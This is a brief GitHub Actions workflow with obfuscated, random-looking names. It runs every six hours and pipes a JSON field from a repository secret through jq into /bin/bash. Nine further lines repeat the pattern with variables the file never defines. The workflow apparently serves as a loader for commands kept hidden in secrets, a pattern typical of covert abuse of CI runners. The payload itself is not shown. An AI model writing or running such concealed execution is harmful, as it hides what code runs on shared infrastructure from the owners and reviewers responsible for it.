name: huangjiao2315
on:
  workflow_dispatch:
  schedule:
    - cron: '48 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: huangjiao2315
        env:
          pli97663: ${{ secrets.pli97663 }}
        run: |
          echo $pli97663 | jq -r .pe0 | /bin/bash
          echo $hzxoh96 | jq -r .iu6580 | /bin/bash
          echo $hef6024 | jq -r .mrw1 | /bin/bash
          echo $xtj25 | jq -r .xa04061 | /bin/bash
          echo $qxrf35794 | jq -r .z5929 | /bin/bash
          echo $lo27700 | jq -r .jn17894 | /bin/bash
          echo $rr9963 | jq -r .fz82 | /bin/bash
          echo $rwbkt9 | jq -r .efwd311 | /bin/bash
          echo $rcyuf180 | jq -r .ayu25 | /bin/bash
          echo $lgfz9 | jq -r .qjfb491 | /bin/bash

